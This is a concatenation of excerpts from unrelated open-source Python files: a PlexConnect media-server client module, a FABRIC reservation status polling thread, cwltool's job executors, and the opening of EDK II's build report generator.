Server.append(Playlist)
for Video in XML.getiterator('Video'): # copy "Video" content, add PMS to links
key = Video.get('key') # absolute path
Video.set('key', PMS_mark + getURL('', path, key))
if 'thumb' in Video.attrib:
Video.set('thumb', PMS_mark + getURL('', path, Video.get('thumb')))
if 'parentKey' in Video.attrib:
Video.set('parentKey', PMS_mark + getURL('', path, Video.get('parentKey')))
if 'parentThumb' in Video.attrib:
Video.set('parentThumb', PMS_mark + getURL('', path, Video.get('parentThumb')))
if 'grandparentKey' in Video.attrib:
Video.set('grandparentKey', PMS_mark + getURL('', path, Video.get('grandparentKey')))
if 'grandparentThumb' in Video.attrib:
Video.set('grandparentThumb', PMS_mark + getURL('', path, Video.get('grandparentThumb')))
Server.append(Video)
root.set('size', str(len(root.findall('Server'))))
XML = etree.ElementTree(root)
dprint(__name__, 1, "====== Local Server/Sections XML ======")
dprint(__name__, 1, XML.getroot())
dprint(__name__, 1, "====== Local Server/Sections XML finished ======")
return XML # XML representation - created "just in time". Do we need to cache it?
def getURL(baseURL, path, key):
if key.startswith('http://') or key.startswith('https://'): # external server
URL = key
elif key.startswith('/'): # internal full path.
URL = baseURL + key
elif key == '': # internal path
URL = baseURL + path
else: # internal path, add-on
URL = baseURL + path + '/' + key
return URL
"""
MyPlex Sign In, Sign Out
parameters:
username - Plex forum name, MyPlex login, or email address
password
options - dict() of PlexConnect-options as received from aTV - necessary: PlexConnectUDID
result:
username
authtoken - token for subsequent communication with MyPlex
"""
def MyPlexSignIn(username, password, options):
# MyPlex web address
MyPlexHost = 'plex.tv'
MyPlexSignInPath = '/users/sign_in.xml'
MyPlexURL = 'https://' + MyPlexHost + MyPlexSignInPath
# create POST request
xargs = getXArgsDeviceInfo(options)
request = urllib2.Request(MyPlexURL, None, xargs)
request.get_method = lambda: 'POST' # turn into 'POST' - done automatically with data!=None. But we don't have data.
# no certificate, will fail with "401 - Authentification required"
"""
try:
f = urllib2.urlopen(request)
except urllib2.HTTPError, e:
print e.headers
print "has WWW_Authenticate:", e.headers.has_key('WWW-Authenticate')
print
"""
# provide credentials
### optional... when 'realm' is unknown
##passmanager = urllib2.HTTPPasswordMgrWithDefaultRealm()
##passmanager.add_password(None, address, username, password) # None: default "realm"
passmanager = urllib2.HTTPPasswordMgr()
passmanager.add_password(MyPlexHost, MyPlexURL, username, password) # realm = 'plex.tv'
authhandler = urllib2.HTTPBasicAuthHandler(passmanager)
urlopener = urllib2.build_opener(authhandler)
# sign in, get MyPlex response
try:
response = urlopener.open(request).read()
except urllib2.HTTPError, e:
if e.code==401:
dprint(__name__, 0, 'Authentication failed')
return ('', '')
else:
raise
dprint(__name__, 1, "====== MyPlex sign in XML ======")
dprint(__name__, 1, response)
dprint(__name__, 1, "====== MyPlex sign in XML finished ======")
# analyse response
XMLTree = etree.ElementTree(etree.fromstring(response))
el_username = XMLTree.find('username')
el_authtoken = XMLTree.find('authentication-token')
if el_username is None or \
el_authtoken is None:
username = ''
authtoken = ''
dprint(__name__, 0, 'MyPlex Sign In failed')
else:
username = el_username.text
authtoken = el_authtoken.text
dprint(__name__, 0, 'MyPlex Sign In successfull')
return (username, authtoken)
def MyPlexSignOut(authtoken):
# MyPlex web address
MyPlexHost = 'plex.tv'
MyPlexSignOutPath = '/users/sign_out.xml'
MyPlexURL = 'http://' + MyPlexHost + MyPlexSignOutPath
# create POST request
xargs = { 'X-Plex-Token': authtoken }
request = urllib2.Request(MyPlexURL, None, xargs)
request.get_method = lambda: 'POST' # turn into 'POST' - done automatically with data!=None. But we don't have data.
response = urllib2.urlopen(request).read()
dprint(__name__, 1, "====== MyPlex sign out XML ======")
dprint(__name__, 1, response)
dprint(__name__, 1, "====== MyPlex sign out XML finished ======")
dprint(__name__, 0, 'MyPlex Sign Out done')
def MyPlexSwitchHomeUser(id, pin, options, authtoken):
MyPlexHost = 'https://plex.tv'
MyPlexURL = MyPlexHost + '/api/home/users/' + id + '/switch'
if pin:
MyPlexURL += '?pin=' + pin
xargs = {}
if options:
xargs = getXArgsDeviceInfo(options)
xargs['X-Plex-Token'] = authtoken
request = urllib2.Request(MyPlexURL, None, xargs)
request.get_method = lambda: 'POST' # turn into 'POST' - done automatically with data!=None. But we don't have data.
response = urllib2.urlopen(request).read()
dprint(__name__, 1, "====== MyPlexHomeUser XML ======")
dprint(__name__, 1, response)
dprint(__name__, 1, "====== MyPlexHomeUser XML finished ======")
# analyse response
XMLTree = etree.ElementTree(etree.fromstring(response))
el_user = XMLTree.getroot() # root=<user>. double check?
username = el_user.attrib.get('title', '')
authtoken = el_user.attrib.get('authenticationToken', '')
if username and authtoken:
dprint(__name__, 0, 'MyPlex switch HomeUser change successfull')
else:
dprint(__name__, 0, 'MyPlex switch HomeUser change failed')
return (username, authtoken)
"""
Transcode Video support
parameters:
path
AuthToken
options - dict() of PlexConnect-options as received from aTV
action - transcoder action: Auto, Directplay, Transcode
quality - (resolution, quality, bitrate)
subtitle - {'selected', 'dontBurnIn', 'size'}
audio - {'boost'}
result:
final path to pull in PMS transcoder
"""
def getTranscodeVideoPath(path, AuthToken, options, action, quality, subtitle, audio, partIndex):
UDID = options['PlexConnectUDID']
transcodePath = '/video/:/transcode/universal/start.m3u8?'
vRes = quality[0]
vQ = quality[1]
mVB = quality[2]
dprint(__name__, 1, "Setting transcode quality Res:{0} Q:{1} {2}Mbps", vRes, vQ, mVB)
dprint(__name__, 1, "Subtitle: selected {0}, dontBurnIn {1}, size {2}", subtitle['selected'], subtitle['dontBurnIn'], subtitle['size'])
dprint(__name__, 1, "Audio: boost {0}", audio['boost'])
args = dict()
args['session'] = UDID
args['protocol'] = 'hls'
args['videoResolution'] = vRes
args['maxVideoBitrate'] = mVB
args['videoQuality'] = vQ
args['mediaBufferSize'] = '80000'
args['directStream'] = '0' if action=='Transcode' else '1'
# 'directPlay' - handled by the client in MEDIARUL()
args['subtitleSize'] = subtitle['size']
args['skipSubtitles'] = subtitle['dontBurnIn'] #'1' # shut off PMS subtitles. Todo: skip only for aTV native/SRT (or other supported)
args['audioBoost'] = audio['boost']
args['fastSeek'] = '1'
args['path'] = path
args['partIndex'] = partIndex
xargs = getXArgsDeviceInfo(options)
xargs['X-Plex-Client-Capabilities'] = "protocols=http-live-streaming,http-mp4-streaming,http-streaming-video,http-streaming-video-720p,http-mp4-video,http-mp4-video-720p;videoDecoders=h264{profile:high&resolution:1080&level:41};audioDecoders=mp3,aac{bitrate:160000}"
if not AuthToken=='':
xargs['X-Plex-Token'] = AuthToken
return transcodePath + urlencode(args) + '&' + urlencode(xargs)
"""
Direct Video Play support
parameters:
path
AuthToken
Indirect - media indirect specified, grab child XML to gain real path
options
result:
final path to media file
"""
def getDirectVideoPath(key, AuthToken):
if key.startswith('http://') or key.startswith('https://'): # external address - keep
path = key
else:
if AuthToken=='':
path = key
else:
xargs = dict()
xargs['X-Plex-Token'] = AuthToken
if key.find('?')==-1:
path = key + '?' + urlencode(xargs)
else:
path = key + '&' + urlencode(xargs)
return path
"""
Transcode Image support
parameters:
key
AuthToken
path - source path of current XML: path[srcXML]
width
height
result:
final path to image file
"""
def getTranscodeImagePath(key, AuthToken, path, width, height):
if key.startswith('http://') or key.startswith('https://'): # external address - can we get a transcoding request for external images?
path = key
elif key.startswith('/'): # internal full path.
path = 'http://127.0.0.1:32400' + key
else: # internal path, add-on
path = 'http://127.0.0.1:32400' + path + '/' + key
path = path.encode('utf8')
# This is bogus (note the extra path component) but ATV is stupid when it comes to caching images, it doesn't use querystrings.
# Fortunately PMS is lenient...
transcodePath = '/photo/:/transcode/' +str(width)+'x'+str(height)+ '/' + quote_plus(path)
args = dict()
args['width'] = width
args['height'] = height
args['url'] = path
if not AuthToken=='':
args['X-Plex-Token'] = AuthToken
return transcodePath + '?' + urlencode(args)
"""
Direct Image support
parameters:
path
AuthToken
result:
final path to image file
"""
def getDirectImagePath(path, AuthToken):
if not AuthToken=='':
xargs = dict()
xargs['X-Plex-Token'] = AuthToken
if path.find('?')==-1:
path = path + '?' + urlencode(xargs)
else:
path = path + '&' + urlencode(xargs)
return path
"""
Transcode Audio support
parameters:
path
AuthToken
options - dict() of PlexConnect-options as received from aTV
maxAudioBitrate - [kbps]
result:
final path to pull in PMS transcoder
"""
def getTranscodeAudioPath(path, AuthToken, options, maxAudioBitrate):
UDID = options['PlexConnectUDID']
transcodePath = '/music/:/transcode/universal/start.mp3?'
args = dict()
args['path'] = path
args['session'] = UDID
args['protocol'] = 'hls'
args['maxAudioBitrate'] = maxAudioBitrate
xargs = getXArgsDeviceInfo(options)
if not AuthToken=='':
xargs['X-Plex-Token'] = AuthToken
return transcodePath + urlencode(args) + '&' + urlencode(xargs)
"""
Direct Audio support
parameters:
path
AuthToken
result:
final path to audio file
"""
def getDirectAudioPath(path, AuthToken):
if not AuthToken=='':
xargs = dict()
xargs['X-Plex-Token'] = AuthToken
if path.find('?')==-1:
path = path + '?' + urlencode(xargs)
else:
path = path + '&' + urlencode(xargs)
return path
if __name__ == '__main__':
testPlexGDM = 0
testLocalPMS = 0
testSectionXML = 1
testMyPlexXML = 0
testMyPlexSignIn = 0
testMyPlexSignOut = 0
username = 'abc'
password = 'def'
token = 'xyz'
# test PlexGDM
if testPlexGDM:
dprint('', 0, "*** PlexGDM")
PMS_list = PlexGDM()
dprint('', 0, PMS_list)
# test XML from local PMS
if testLocalPMS:
dprint('', 0, "*** XML from local PMS")
XML = getXMLFromPMS('http://127.0.0.1:32400', '/library/sections')
# test local Server/Sections
if testSectionXML:
dprint('', 0, "*** local Server/Sections")
PMS_list = PlexGDM()
XML = getSectionXML(PMS_list, {}, '')
# test XML from MyPlex
if testMyPlexXML:
dprint('', 0, "*** XML from MyPlex")
XML = getXMLFromPMS('https://plex.tv', '/pms/servers', None, token)
XML = getXMLFromPMS('https://plex.tv', '/pms/system/library/sections', None, token)
# test MyPlex Sign In
if testMyPlexSignIn:
dprint('', 0, "*** MyPlex Sign In")
options = {'PlexConnectUDID':'007'}
(user, token) = MyPlexSignIn(username, password, options)
if user=='' and token=='':
dprint('', 0, "Authentication failed")
else:
dprint('', 0, "logged in: {0}, {1}", user, token)
# test MyPlex Sign out
if testMyPlexSignOut:
dprint('', 0, "*** MyPlex Sign Out")
MyPlexSignOut(token)
dprint('', 0, "logged out")
# test transcoder
|
reservation_status_update_thread.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2020 FABRIC Testbed
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# Author: Komal Thareja (kthare10@renci.org)
import queue
import threading
import traceback
from typing import List
from fabric_cf.actor.core.util.id import ID
from fabric_cf.actor.core.util.iterable_queue import IterableQueue
from fabric_cf.orchestrator.core.active_status_checker import ActiveStatusChecker
from fabric_cf.orchestrator.core.exceptions import OrchestratorException
from fabric_cf.orchestrator.core.i_status_update_callback import IStatusUpdateCallback
from fabric_cf.orchestrator.core.status_checker import StatusChecker, Status
from fabric_cf.orchestrator.core.watch_entry import WatchEntry
class ReservationStatusUpdateThread:
"""
This thread allows expressing interest in completion of certain reservations and can run callbacks on other specified
reservations when the status changes accordingly
The periodic thread polls reservations of interest to determine whether the they have reached the required state,
upon which the callback is invoked
"""
MODIFY_CHECK_PERIOD = 5 # seconds
def __init__(self):
self.controller = None
self.thread_lock = threading.Lock()
self.reservation_lock = threading.Lock()
self.active_watch = queue.Queue()
self.stopped_worker = threading.Event()
from fabric_cf.actor.core.container.globals import GlobalsSingleton
self.logger = GlobalsSingleton.get().get_logger()
self.thread = None
self.stopped = False
def start(self):
"""
Start
:return:
"""
try:
self.thread_lock.acquire()
if self.thread is not None:
raise OrchestratorException("This ReservationStatusUpdateThread has already been started")
self.thread = threading.Thread(target=self.periodic)
self.thread.setName(self.__class__.__name__)
self.thread.setDaemon(True)
self.thread.start()
finally:
self.thread_lock.release()
def stop(self):
"""
Stop
:return:
"""
self.stopped = True
self.stopped_worker.set()
try:
self.thread_lock.acquire()
temp = self.thread
self.thread = None
if temp is not None:
self.logger.warning("It seems that the ReservationStatusUpdateThread is running. Interrupting it")
try:
temp.join()
except Exception as e:
self.logger.error("Could not join ReservationStatusUpdateThread thread {}".format(e))
finally:
self.thread_lock.release()
finally:
if self.thread_lock is not None and self.thread_lock.locked():
self.thread_lock.release()
def periodic(self):
"""
Periodic
:return:
"""
self.logger.debug("Reservation Status Update Thread started")
while not self.stopped_worker.wait(timeout=self.MODIFY_CHECK_PERIOD):
self.run()
self.logger.debug("Reservation Status Update Thread exited")
def __add_active_status_watch(self, *, we: WatchEntry):
try:
self.reservation_lock.acquire()
self.logger.debug(f"Added watch entry {we}")
self.active_watch.put_nowait(we)
finally:
self.reservation_lock.release()
def add_active_status_watch(self, *, watch: ID, callback: IStatusUpdateCallback):
"""
Watch for transition to Active or Failed. Callback is called when reservation has either Failed or became Active
@param watch - reservation to watch
@param callback - callback object
"""
if watch is None or callback is None:
self.logger.info(f"watch {watch} callback {callback}, ignoring")
return
self.__add_active_status_watch(we=WatchEntry(watch=watch, callback=callback))
def process_watch_list(self, *, watch_list: List[WatchEntry], watch_type: str, status_checker: StatusChecker):
"""
Process watch list
:param watch_list:
:param watch_type:
:param status_checker:
:return:
"""
to_remove = []
self.logger.debug(f"Scanning {watch_type} watch list {len(watch_list)}")
if self.controller is None:
from fabric_cf.orchestrator.core.orchestrator_kernel import OrchestratorKernelSingleton
self.controller = OrchestratorKernelSingleton.get().get_management_actor()
for watch_entry in watch_list:
status, reservation = status_checker.check(controller=self.controller, rid=watch_entry.reservation_to_watch)
self.logger.info(f"Status------- {status} for {reservation.get_reservation_id()}")
if status == Status.OK:
to_remove.append(watch_entry)
watch_entry.callback.success(controller=self.controller, reservation=reservation)
elif status == Status.NOT_OK:
to_remove.append(watch_entry)
watch_entry.callback.failure(controller=self.controller, reservation=reservation)
self.logger.debug(f"Removing {watch_type} entries from watch {len(to_remove)}")
for we in to_remove:
watch_list.remove(we)
# Add the Not Ready entries back
for we in watch_list:
self.__add_active_status_watch(we=we)
def run(self):
# wake up periodically and check the status of reservations (state or unit modify properties)
# and call appropriate callbacks if necessary.
# scan both lists and check if any of the
# reservation groups on them are ready for callbacks
# remove those ready for callbacks off the lists and invoke callbacks
# outside the critical section
# NOTE: because callback can create another callback, which can add watches,
# we must make this code re-entrant hence the need to change the watch list
# and only then call the callbacks
try:
active_watch_list = []
try:
self.reservation_lock.acquire()
if not self.active_watch.empty():
for a in IterableQueue(source_queue=self.active_watch):
active_watch_list.append(a)
finally:
self.reservation_lock.release()
self.process_watch_list(watch_list=active_watch_list, watch_type="active",
status_checker=ActiveStatusChecker())
except Exception as e:
self.logger.error(f"RuntimeException: {e} continuing")
self.logger.error(traceback.format_exc())
|
executors.py
|
# -*- coding: utf-8 -*-
""" Single and multi-threaded executors."""
import datetime
import os
import tempfile
import threading
from abc import ABCMeta, abstractmethod
from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Union
import psutil
from six import string_types, with_metaclass
from typing_extensions import Text # pylint: disable=unused-import
from schema_salad.validate import ValidationException
from .builder import Builder # pylint: disable=unused-import
from .context import (RuntimeContext, # pylint: disable=unused-import
getdefault)
from .errors import WorkflowException
from .job import JobBase # pylint: disable=unused-import
from .loghandler import _logger
from .mutation import MutationManager
from .process import Process # pylint: disable=unused-import
from .process import cleanIntermediate, relocateOutputs
from .provenance import ProvenanceProfile
from .utils import DEFAULT_TMP_PREFIX
from .workflow import Workflow, WorkflowJob, WorkflowJobStep
class JobExecutor(with_metaclass(ABCMeta, object)):
""" Abstract base job executor. """
def __init__(self):
# type: (...) -> None
self.final_output = [] # type: List
self.final_status = [] # type: List
self.output_dirs = set() # type: Set
def __call__(self, *args, **kwargs):
return self.execute(*args, **kwargs)
def output_callback(self, out, process_status):
""" Collect the final status and outputs. """
self.final_status.append(process_status)
self.final_output.append(out)
@abstractmethod
def run_jobs(self,
process, # type: Process
job_order_object, # type: Dict[Text, Any]
logger,
runtime_context # type: RuntimeContext
): # type: (...) -> None
""" Execute the jobs for the given Process. """
def execute(self,
process, # type: Process
job_order_object, # type: Dict[Text, Any]
runtime_context, # type: RuntimeContext
logger=_logger,
): # type: (...) -> Tuple[Optional[Dict[Text, Any]], Text]
""" Execute the process. """
if not runtime_context.basedir:
raise WorkflowException("Must provide 'basedir' in runtimeContext")
finaloutdir = None # Type: Optional[Text]
original_outdir = runtime_context.outdir
if isinstance(original_outdir, string_types):
finaloutdir = os.path.abspath(original_outdir)
runtime_context = runtime_context.copy()
runtime_context.outdir = tempfile.mkdtemp(
prefix=getdefault(runtime_context.tmp_outdir_prefix, DEFAULT_TMP_PREFIX))
self.output_dirs.add(runtime_context.outdir)
runtime_context.mutation_manager = MutationManager()
runtime_context.toplevel = True
runtime_context.workflow_eval_lock = threading.Condition(threading.RLock())
job_reqs = None
if "https://w3id.org/cwl/cwl#requirements" in job_order_object:
if process.metadata.get("http://commonwl.org/cwltool#original_cwlVersion") == 'v1.0':
raise WorkflowException(
"`cwl:requirements` in the input object is not part of CWL "
"v1.0. You can adjust to use `cwltool:overrides` instead; or you "
"can set the cwlVersion to v1.1.0-dev1 or greater and re-run with "
"--enable-dev.")
job_reqs = job_order_object["https://w3id.org/cwl/cwl#requirements"]
elif ("cwl:defaults" in process.metadata
and "https://w3id.org/cwl/cwl#requirements"
in process.metadata["cwl:defaults"]):
if process.metadata.get("http://commonwl.org/cwltool#original_cwlVersion") == 'v1.0':
raise WorkflowException(
"`cwl:requirements` in the input object is not part of CWL "
"v1.0. You can adjust to use `cwltool:overrides` instead; or you "
"can set the cwlVersion to v1.1.0-dev1 or greater and re-run with "
"--enable-dev.")
job_reqs = process.metadata["cwl:defaults"]["https://w3id.org/cwl/cwl#requirements"]
if job_reqs is not None:
for req in job_reqs:
process.requirements.append(req)
self.run_jobs(process, job_order_object, logger, runtime_context)
if self.final_output and self.final_output[0] is not None and finaloutdir is not None:
self.final_output[0] = relocateOutputs(
self.final_output[0], finaloutdir, self.output_dirs,
runtime_context.move_outputs, runtime_context.make_fs_access(""),
getdefault(runtime_context.compute_checksum, True),
path_mapper=runtime_context.path_mapper)
if runtime_context.rm_tmpdir:
if runtime_context.cachedir is None:
output_dirs = self.output_dirs # type: Iterable[Any]
else:
output_dirs = filter(lambda x: not x.startswith(
runtime_context.cachedir), self.output_dirs)
cleanIntermediate(output_dirs)
if self.final_output and self.final_status:
if runtime_context.research_obj is not None and \
isinstance(process, (JobBase, Process, WorkflowJobStep,
WorkflowJob)) and process.parent_wf:
process_run_id = None
name = "primary"
process.parent_wf.generate_output_prov(self.final_output[0],
process_run_id, name)
process.parent_wf.document.wasEndedBy(
process.parent_wf.workflow_run_uri, None, process.parent_wf.engine_uuid,
datetime.datetime.now())
process.parent_wf.finalize_prov_profile(name=None)
return (self.final_output[0], self.final_status[0])
return (None, "permanentFail")
class SingleJobExecutor(JobExecutor):
""" Default single-threaded CWL reference executor. """
def run_jobs(self,
process, # type: Process
job_order_object, # type: Dict[Text, Any]
logger,
runtime_context # type: RuntimeContext
): # type: (...) -> None
process_run_id = None # type: Optional[str]
# define provenance profile for single commandline tool
if not isinstance(process, Workflow) \
and runtime_context.research_obj is not None:
process.provenance_object = ProvenanceProfile(
runtime_context.research_obj,
full_name=runtime_context.cwl_full_name,
host_provenance=False,
user_provenance=False,
orcid=runtime_context.orcid,
# single tool execution, so RO UUID = wf UUID = tool UUID
run_uuid=runtime_context.research_obj.ro_uuid)
process.parent_wf = process.provenance_object
jobiter = process.job(job_order_object, self.output_callback,
runtime_context)
try:
for job in jobiter:
if job is not None:
if runtime_context.builder is not None:
job.builder = runtime_context.builder
if job.outdir is not None:
self.output_dirs.add(job.outdir)
if runtime_context.research_obj is not None:
if not isinstance(process, Workflow):
prov_obj = process.provenance_object
else:
prov_obj = job.prov_obj
if prov_obj:
runtime_context.prov_obj = prov_obj
prov_obj.evaluate(
process, job, job_order_object,
runtime_context.research_obj)
process_run_id =\
prov_obj.record_process_start(process, job)
runtime_context = runtime_context.copy()
runtime_context.process_run_id = process_run_id
job.run(runtime_context)
else:
logger.error("Workflow cannot make any more progress.")
break
except (ValidationException, WorkflowException): # pylint: disable=try-except-raise
raise
except Exception as err:
logger.exception("Got workflow error")
raise WorkflowException(Text(err))
class MultithreadedJobExecutor(JobExecutor):
"""
Experimental multi-threaded CWL executor.
Does simple resource accounting, will not start a job unless it
has cores / ram available, but does not make any attempt to
optimize usage.
"""
def __init__(self): # type: () -> None
super(MultithreadedJobExecutor, self).__init__()
self.threads = set() # type: Set[threading.Thread]
self.exceptions = [] # type: List[WorkflowException]
self.pending_jobs = [] # type: List[Union[JobBase, WorkflowJob]]
self.pending_jobs_lock = threading.Lock()
self.max_ram = psutil.virtual_memory().available / 2**20
self.max_cores = psutil.cpu_count()
self.allocated_ram = 0
self.allocated_cores = 0
def select_resources(self, request, runtime_context): # pylint: disable=unused-argument
# type: (Dict[str, int], RuntimeContext) -> Dict[str, int]
""" Naïve check for available cpu cores and memory. """
result = {} # type: Dict[str, int]
maxrsc = {
"cores": self.max_cores,
"ram": self.max_ram
}
for rsc in ("cores", "ram"):
if request[rsc+"Min"] > maxrsc[rsc]:
raise WorkflowException(
"Requested at least %d %s but only %d available" %
(request[rsc+"Min"], rsc, maxrsc[rsc]))
if request[rsc+"Max"] < maxrsc[rsc]:
result[rsc] = request[rsc+"Max"]
else:
result[rsc] = maxrsc[rsc]
return result
def _runner(self, job, runtime_context):
""" Job running thread. """
try:
job.run(runtime_context)
except WorkflowException as err:
_logger.exception("Got workflow error")
self.exceptions.append(err)
except Exception as err: # pylint: disable=broad-except
_logger.exception("Got workflow error")
self.exceptions.append(WorkflowException(Text(err)))
finally:
with runtime_context.workflow_eval_lock:
self.threads.remove(threading.current_thread())
if isinstance(job, JobBase):
self.allocated_ram -= job.builder.resources["ram"]
self.allocated_cores -= job.builder.resources["cores"]
runtime_context.workflow_eval_lock.notifyAll()
def run_job(self,
job, # type: Union[JobBase, WorkflowJob, None]
runtime_context # type: RuntimeContext
): # type: (...) -> None
""" Execute a single Job in a seperate thread. """
if job is not None:
with self.pending_jobs_lock:
self.pending_jobs.append(job)
with self.pending_jobs_lock:
n = 0
while (n+1) <= len(self.pending_jobs):
job = self.pending_jobs[n]
if isinstance(job, JobBase):
if ((job.builder.resources["ram"])
> self.max_ram
or (job.builder.resources["cores"])
> self.max_cores):
_logger.error(
'Job "%s" cannot be run, requests more resources (%s) '
'than available on this host (max ram %d, max cores %d',
job.name, job.builder.resources,
self.allocated_ram,
self.allocated_cores,
self.max_ram,
self.max_cores)
self.pending_jobs.remove(job)
return
if ((self.allocated_ram + job.builder.resources["ram"])
> self.max_ram
or (self.allocated_cores + job.builder.resources["cores"])
> self.max_cores):
_logger.debug(
'Job "%s" cannot run yet, resources (%s) are not '
'available (already allocated ram is %d, allocated cores is %d, '
'max ram %d, max cores %d',
job.name, job.builder.resources,
self.allocated_ram,
self.allocated_cores,
self.max_ram,
self.max_cores)
n += 1
continue
thread = threading.Thread(target=self._runner, args=(job, runtime_context))
thread.daemon = True
self.threads.add(thread)
if isinstance(job, JobBase):
self.allocated_ram += job.builder.resources["ram"]
self.allocated_cores += job.builder.resources["cores"]
thread.start()
self.pending_jobs.remove(job)
def wait_for_next_completion(self, runtime_context):
# type: (RuntimeContext) -> None
""" Wait for jobs to finish. """
if runtime_context.workflow_eval_lock is not None:
runtime_context.workflow_eval_lock.wait()
if self.exceptions:
raise self.exceptions[0]
def run_jobs(self,
process, # type: Process
job_order_object, # type: Dict[Text, Any]
logger,
runtime_context # type: RuntimeContext
): # type: (...) -> None
jobiter = process.job(job_order_object, self.output_callback,
runtime_context)
if runtime_context.workflow_eval_lock is None:
raise WorkflowException(
"runtimeContext.workflow_eval_lock must not be None")
runtime_context.workflow_eval_lock.acquire()
for job in jobiter:
if job is not None:
if isinstance(job, JobBase):
job.builder = runtime_context.builder or job.builder
if job.outdir is not None:
self.output_dirs.add(job.outdir)
self.run_job(job, runtime_context)
if job is None:
if self.threads:
self.wait_for_next_completion(runtime_context)
else:
logger.error("Workflow cannot make any more progress.")
break
self.run_job(None, runtime_context)
while self.threads:
self.wait_for_next_completion(runtime_context)
self.run_job(None, runtime_context)
runtime_context.workflow_eval_lock.release()
|
BuildReport.py
|
## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from StringIO import StringIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.AutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
}
## The look up table to map module type to driver type
gDriverTypeMap = {
SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
